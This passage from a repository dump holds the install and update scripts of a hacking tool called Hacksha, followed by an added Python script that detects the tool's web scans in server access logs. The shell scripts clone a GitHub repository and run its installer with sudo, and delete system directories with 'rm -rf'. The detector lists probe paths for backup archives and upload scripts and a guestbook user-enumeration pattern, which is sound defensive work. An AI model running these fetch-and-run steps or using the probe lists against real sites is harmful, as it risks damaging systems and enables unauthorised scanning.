    BIN_DIR="$PREFIX/usr/bin/"
    pkg install -y git python2
else
    INSTALL_DIR="/usr/share/doc/Hacksha"
    BIN_DIR="/usr/bin/"
fi

echo "[✔] Checking directories...";
if [ -d "$INSTALL_DIR" ]; then
    echo "[!] A Directory Hacksha Was Found.. Do You Want To Replace It ? [y/n]:" ;
    read shadab
    if [ "$shadab" = "y" ]; then
        rm -R "$INSTALL_DIR"
    else
        exit
    fi
fi

echo "[✔] Installing ...";
echo "";
git clone https://github.com/hackyshadab/Hacksha.git "$INSTALL_DIR";
# Write a launcher script and copy it to /usr/bin/ (BIN_DIR is set above but not used here).
echo "#!/bin/bash
python $INSTALL_DIR/Hacksha.py" '${1+"$@"}' > Hacksha;
chmod +x Hacksha;
sudo cp Hacksha /usr/bin/;
rm Hacksha;


if [ -d "$INSTALL_DIR" ] ;
then
    echo "";
    echo "[✔] Successfuly Installed !!! [✔]";
    echo "";
    echo "[✔]========================================================================[✔]";
    echo "[✔] ✔✔✔ All Is Done!! you can execute tool by typing Hacksha !! ✔✔✔ [✔]";
    echo "[✔]========================================================================[✔]";
    echo "";
else
    echo "[✘] Installation Failed !!! [✘]";
    exit
fi

--------------------------------------------------------------------------------
/update.sh:
--------------------------------------------------------------------------------
clear

# Sets the execute bit on two system directories.
sudo chmod +x /etc/

clear

sudo chmod +x /usr/share/doc

clear

# Removes the previous install before cloning a fresh copy.
sudo rm -rf /usr/share/doc/Hacksha/

clear

cd /etc/

clear

sudo rm -rf /etc/Shadab_the_hacker

clear

mkdir Shadab_the_hacker

clear

cd Shadab_the_hacker

clear

git clone https://github.com/hackyshadab/Hacksha.git

clear

cd Hacksha

clear

sudo chmod +x install.sh

clear

# Runs whatever install.sh the repository contains at clone time.
./install.sh

clear

--------------------------------------------------------------------------------
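The fixed probe paths in findZip, findUp and getUsers in hacksha.py above double as detection signatures for web server access logs. The following is an added example, not part of the Hacksha repository: it flags clients that sweep those paths or walk the guestbook.cgi user parameter, and lists any backup archive that answered 200. The log lines are constructed, and the function names and the min_probes threshold are assumptions.

```python
import re
from collections import defaultdict
# Paths copied from zipList, upList and getUsers() in hacksha.py above.
ARCHIVE_PROBES = set("""backup.tar.gz backup/backup.tar.gz backup/backup.zip
vb/backup.zip site/backup.zip backup.zip backup.rar backup.sql vb/vb.zip vb.zip
vb.sql vb.rar vb1.zip vb2.zip vbb.zip vb3.zip upload.zip up/upload.zip
joomla.zip joomla.rar joomla.sql wordpress.zip wp/wordpress.zip
blog/wordpress.zip wordpress.rar""".split())
UPLOAD_PROBES = set("""up.php up1.php up/up.php site/up.php vb/up.php
forum/up.php blog/up.php upload.php upload1.php upload2.php vb/upload.php
forum/upload.php blog/upload.php site/upload.php download.php""".split())
# Common/combined log format: client IP, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

def classify(target):
    path, _, query = target.partition("?")
    rel = path.lstrip("/")  # base URL + path is concatenated, so "//" occurs
    if rel == "cgi-sys/guestbook.cgi" and query.startswith("user="):
        return "user-enum"
    if rel in ARCHIVE_PROBES:
        return "archive"
    return "upload" if rel in UPLOAD_PROBES else None

def scan(lines, min_probes=5):  # min_probes is an assumed threshold
    probes, users, exposed = defaultdict(set), defaultdict(list), set()
    for line in lines:
        m = LOG_RE.match(line)
        kind = classify(m.group(2)) if m else None
        if kind is None:
            continue
        ip, target, status = m.groups()
        probes[ip].add(target)
        if kind == "user-enum":
            users[ip].append(target.split("user=", 1)[1])
        elif kind == "archive" and status == "200":
            exposed.add(target)  # a backup is actually downloadable
    flagged = {}
    for ip, seen in probes.items():
        u = users[ip]  # getUsers() drops one trailing character per request
        trimming = len(u) >= 3 and all(b == a[:-1] for a, b in zip(u, u[1:]))
        if trimming or len(seen) >= min_probes:
            flagged[ip] = "user-enum" if trimming else "path-sweep"
    return flagged, exposed

# Constructed log lines using documentation address ranges.
FMT = '%s - - [01/Jan/2024:10:00:00 +0000] "GET %s HTTP/1.0" %s 0'
SAMPLE = ([FMT % ("203.0.113.7", "/" + p, 404) for p in sorted(ARCHIVE_PROBES)[-5:]]
          + [FMT % ("203.0.113.7", "/backup.sql", 200)]
          + [FMT % ("198.51.100.9", "//cgi-sys/guestbook.cgi?user=" + u, 200)
             for u in ("exampleorg", "exampleor", "exampleo")]
          + [FMT % ("192.0.2.44", "/upload.php", 200)])
```

Calling scan(SAMPLE) returns the flagged clients with the reason for each, plus the set of archive paths that were served; a single request for a legitimate upload.php stays below the threshold.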